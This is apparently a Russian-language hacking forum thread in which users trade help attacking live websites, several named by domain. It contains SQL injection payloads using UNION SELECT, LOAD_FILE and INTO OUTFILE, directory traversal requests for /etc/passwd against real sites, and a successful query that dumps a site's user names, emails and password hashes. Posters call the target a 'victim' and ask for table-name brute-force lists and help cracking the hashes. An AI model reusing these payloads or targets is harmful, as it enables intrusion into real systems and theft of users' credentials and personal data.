почему шелл при попытке открыть etc/passwd или прочитать другой каталог выше самого сайты выдает ошибку HTTP Ошибка 406 - Не приемлемо safe_mode 0, open_basedir no value
LOAD_FILE на Masterhost Жертва находится на Masterhost. 1) нашёл инъекцию, пытаюсь прочитать файл, например так: http://SITE_NAME.com/cgi-bin/library/com/perl/controller.cgi?action=get&uid='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,LOAD_FILE('/home/u53608/SITE_NAME.com/www/english/index.html'),30,'31 Запрос срабатывает, но содержимое файла index.html не показывается. Можно ли узнать, есть ли у пользователя MySQL права на чтение и создание файлов? Или я просто неверно указываю путь к файлу. 2) может быть кто уже знает, есть ли у пользователя MySQL права на чтение и создание файлов?
saynt2day select file_priv from mysql.user where username='user' где user - имя пользователя от которого работает мускуль узнать через функцию user()
Уже запарился пользоваться поиском - нифига не выводит по теме. Где-то была темка в которой выкладывали список часто-юзаемых имен таблиц и столбцов для брутфорса. Подскажите ее, плиз?
при -1+union+select+'1'+into+outfile+'/var/111'/* выдает ошибку Can't create/write to file ......(Errcode: 13) читать файлы можна) это значит права выставлены на папку и нада найти подходящую папку для аплоада или тут чет другое?)
Интересует такой вопрос: Допустим что на сайте есть php уязвимость, для чего в ссылки вида http://www.site.ru/index.php?file= подставлять ../../../../../../../etc/passwd Вот сделал такой запрос http://www.site.ru/index.php?file=../../../../../../../etc/passwd и после такого запроса открывается файл passwd, какую информацию я могу получить из этого файла
из него можно узнать лоигны пользователей, пути к их домашним директориям и наличие у них действующего интерпретатора.
Ну вот например http://www.marine-marketing.gr/newsclip.php?file=../../../../../../../../../../../etc/passwd http://www.movitel.co.cu/descarga.php?file=../../../../../../../../etc/passwd Вот что от сюда можно извлеч? Прост много почитал статей про php инъекции, но не всё усвоил
1) в char мне кажется смысла переводить нет, т.к кавычки не фильтруются и запрос срабатывает. 2) тут мне было интересно, может быть кто уже знает наверняка, есть у пользователя MySQL хостинга masterhost по умолчанию права на доступ к файлам. к сожалению прав доступа к БД mysql у пользователя user() нет.
saynt2day, попробуй load_file('/etc/passwd') или зарегай там акк и посмотри какой полный путь будет у тебя и по аналогии подбери путь до жертвы.
На примере другого мастерхостовского сайта выяснил, как выглядят у них пути: http://www.mobil-life.ru/phones/catalog/?cat=1&madeby=2%27 /home/u20726/mobil-life.ru/www/index.php Но штука в том, что у нужного мне сайта несколько доменных имён, которые все ведут на один сайт. Пытаюсь прописывать все эти домены в SITE_NAME: /home/ACCOUNT/SITE_NAME/www/ и ничего...
Помогите раскрутить баг: http://www.mymovie.in.ua/film_info.php?film_id=323 http://www.mymovie.in.ua/film_info.php?film_id=324-1 http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/UNION/**/SELECT/**/1,2,3/* http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/4/* http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/3/* Не получается подобрать число полей, по GROUP BY получается что должно быть 3 поля, но нет.
Благодарю, krypt3r за помощь Нашел таблицу юзеров: Code: http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+concat(name,0x3a,email,0x3a,pass)+from+user/* Жаль, алгоритм хеширования не из числа популярных